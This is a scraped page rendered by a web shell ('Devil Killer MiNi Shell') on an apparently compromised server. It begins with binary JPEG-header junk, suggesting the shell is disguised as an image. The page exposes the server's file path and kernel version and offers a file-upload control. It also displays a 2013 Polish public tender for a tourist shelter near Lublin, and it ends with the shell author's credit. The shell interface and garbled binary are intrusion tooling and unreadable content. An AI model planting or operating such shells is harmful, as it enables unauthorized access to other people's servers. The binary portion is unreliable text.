JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130207/20317-N-2013.html

<p class="kh_header"><b>Lublin: Budowa wiaty dla turystów w formie
wczesnośredniowiecznej chaty półziemiankowej wraz z elementami małej infrastruktury turystycznej w
ramach realizacji projektu POIŚ.05.01.00-00-228/09 `Ochrona siedlisk przyrodniczych i gatunków na
obszarach sieci Natura 2000 w województwie lubelskim`</b><br>
<b>Numer ogłoszenia: 20317 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie , ul. Bazylianówka 46, 20-144 Lublin, woj. lubelskie, tel. 81 710 65 00, faks 81 710 65 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lublin.rdos.gov.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wiaty dla turystów w formie
wczesnośredniowiecznej chaty półziemiankowej wraz z elementami małej infrastruktury turystycznej w
ramach realizacji projektu POIŚ.05.01.00-00-228/09 `Ochrona siedlisk przyrodniczych i gatunków na
obszarach sieci Natura 2000 w województwie lubelskim`.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
obejmuje: 1. wykonanie ratowniczych badań archeologicznych, w oparciu o pozwole- nie Lubelskiego
Wojewódzkiego Konserwatora Zabytków w Lublinie (uzy- skanie pozwolenia spoczywa na Wykonawcy), 2.
budowę wiaty dla turystów w formie średniowiecznej chaty półziemiankowej. Ściany obiektu wykonane z
drewnianych dranic, łączonych w narożach i połowie długości ścian techniką sumikowo- łątkową. Elementy
drewniane wykonane z drewna sosnowego. Dach obiektu pokryty matami trzcinowymi. Podłoga
pomieszczenia utwardzona polepą z gliny i słomy na podsypce żwirowo-piaskowej. Wszystkie elementy
drewniane muszą być zaimpregnowane pod względem bezpie czeństwa pożarowego, czynników
atmosferycznych, szkodników drewna (grzybów i owadów). Dojście do obiektu w postaci płaszczyzn
żwirowo-piaskowych,wykończonych impregnowanymi balami dębowymi. Dodatkowo Wykonawca
zobowiązany jest do wykonania i zainstalowania wewnątrz wiaty dwóch tablic informacyjnych o wymiarach:
szer. 1m., wys. 1,5 m. 3. budowę drewnianego ogrodzenia (poręczy). Długość planowanych ogrodzeń - poręczy wynosi 200 metrów. Elementy pionowe wykonane z drewna akacjowego (robinia akacjowa).
Poziome szpongi z drewna sosnowego. Wszystkie elementy drewniane muszą być zaimpregnowane; 4.
umocnienie zejścia (budowa drewnianych, terenowych schodów). Do wykonania przewidziano 20 stopni.
Krawędzie umocnione akacjowymi (robinia akacjowa) balami, mocowanymi do akacjowych (robinia
akacjowa) kołków połówkowych. Wszystkie elementy impregnowane, nawierzchnia zejścia umocniona
podsypką żwirowo-piaskowa; 5. obsługę geodezyjną prowadzonych robót w liniach regulujących własności;
6.sprawowanie nadzoru archeologicznego; 7. inwentaryzację powykonawczą; 8. przygotowanie kompletnej
dokumentacji powykonawczej; 9. przywrócenie terenu w rejonie prowadzonych robót do stanu pierwotnego
10.Szczegółowy zakres robót budowlanych określa dokumentacja projektowa oraz Specyfikacja
Techniczna Wykonania i Odbioru Robót Budowlanych (załącznik nr 10 i nr 11 do SIWZ). 11.Opis
techniczny budowy schodów terenowych, ogrodzenia oraz tablic informacyjnych stanowi załącznik nr 12 do
SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.20-8, 45.21.24.12-7, 45.21.32.41-4, 45.42.00.00-7, 45.42.10.00-4, 45.23.31.61-5, 45.23.32.60-9, 45.11.12.00-0, 45.34.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą
wykonanie minimum 3 robót budowlanych w zakresie budowy obiektów drewnianych o wartości
nie mniejszej niż 10.000 zł brutto każda, w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą
dysponowanie osobą/ami posiadającą/ymi odpowiednie: 1. kwalifikacje do: 1.1. kierowania
robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń 1.2.
prowadzenia badań archeologicznych i nadzorów archeologicznych, zgodnie z § 10 pkt 1 i 2
Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac
konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i
architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz
badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z
dnia 30 czerwca 2004 r.) tj. posiadają tytuł zawodowy magistra uzyskany po ukończeniu
wyższych studiów na kierunku archeologia oraz odbyły po ukończeniu tych studiów co najmniej
12-miesięczną praktykę zawodową w zakresie tych badań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać
nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2.Oświadczenie
o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku
powierzenia przez wykonawcę części zamówienia podwykonawcom. 3.Pełnomocnictwo do
reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w
przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy
Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 4.Pełnomocnictwo do
występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie
podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru
Sądowego lub wykonawca - w przypadku osób fizycznych. 5.W sytuacji, gdy Wykonawca polega na wiedzy
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków,
zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia. 6.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony dopuszczają następujące rodzaje i warunki zmiany treści umowy: 1) zmiana materiałów
budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń
wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie
usprawnieniem procesu budowy, zwiększeniem bezpieczeństwa na budowie, 2) zmiana przyjętych
technologii wykonania robót oraz inne nieistotne zmiany treści umowy, w zakresie niezbędnym do realizacji
przedmiotu zamówienia - w szczególności w przypadku lokalnych zmian warunków geologicznych podłoża
w stosunku do opracowanej dokumentacji projektowej, na podstawie której realizowana jest niniejsza
umowa, stosownie do zaistniałych zmian warunków geologicznych podłoża; 3) zmiana terminu realizacji
przedmiotu zamówienia, w przypadku: a) działania siły wyższej, uniemożliwiającej wykonanie umowy w
określonym pierwotnie terminie, b) błędów w dokumentacji projektowej, których usunięcie będzie
poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w
projekcie, c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie
prac budowlanych zgodnie z przyjęta technologią lub spełnienie wymogów technologicznych,
udokumentowanych w dzienniku budowy, d) przerwy w dostawie prądu, wody, gazu, trwającej ponad 7 dni,
e) wydłużenia terminów dostaw materiałów z przyczyn niezależnych od Wykonawcy, f) konieczności
uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, g) konieczności wykonania
dodatkowych badań i ekspertyz, h) konieczności wykonania prac lub badań archeologicznych,
powodujących konieczność wstrzymania robót objętych niniejszą umową, 4) zmiana personelu
wymienionego w załączonym do umowy wykazie osób w przypadku wystąpienia uzasadnionej przyczyny; 2.Zmiany umowy przewidziane w pkt 1 dopuszczalne są na następujących warunkach: - ad pkt 1) -
zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry techniczne,
jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty, pod warunkiem nie
zwiększania wynagrodzenia; - ad pkt. 2) - zmiana na inne technologie wykonania robót oraz inne nieistotne
zmiany treści umowy,w zakresie niezbędnym do realizacji przedmiotu zamówienia, stosownie do
zaistniałych zmian warunków realizacji robót, pod warunkiem nie zwiększania wynagrodzenia; - ad pkt. 3) -
zmiana terminu realizacji zamówienia: lit. a) - o okres niezbędny do usunięcia skutków działania siły
wyższej, lit. b) - o okres konsultacji z projektantem i nanoszenia przez niego poprawek lub zmian w
projekcie, lit. c) - o czas trwania niesprzyjających warunków atmosferycznych, lit. d) - o okres
występowania przerwy w dostawie prądu, wody lub gazu, trwającej ponad 7 dni lit. e) - o okres wydłużenia
terminów dostaw materiałów, lit. f) - o okres niezbędny do uzyskania wymaganych decyzji bądź uzgodnień,
lit. g) - o okres niezbędny do wykonania dodatkowych badań i ekspertyz, lit. h) - o okres niezbędny do
wykonania prac lub badań archeologicznych, - ad pkt 4) - na osoby wskazane przez Wykonawcę,
posiadające wymagane uprawnienia oraz doświadczenie, zgodnie z warunkami udziału w postępowaniu o
udzielenie zamówienia, w wyniku którego oferta Wykonawcy została wybrana jako najkorzystniejsza, i
zaakceptowane na piśmie przez Zamawiającego, zgodnie z wnioskiem o którym mowa w § 9 ust. 2
niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lublin.rdos.gov.pl (w zakładce Zamówienia Publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony
Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka 46, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 09:30, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Lublinie - 20-144 Lublin, ul. Bazylianówka
46, pokój nr 17 (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przedmiot zamówienia jest finansowany ze środków projektu nr POIS.05.01.00-00- 228/09,
`Ochrona siedlisk przyrodniczych i gatunków na obszarach sieci Natura 2000 w województwie lubelskim`
współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego i
realizowanego w ramach Programu Operacyjnego `Infrastruktura i Środowisko, lata 2007-2013`, Priorytet V,
Działanie 5.1. 2.Osobami upoważnionymi do kontaktowania się z wykonawcami są: 2.1.W zakresie przedmiotu
zamówienia: p. Janusz Holuk, p. Robert Bochen. 3.2.W zakresie procedury: p. Waldemar Mańko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com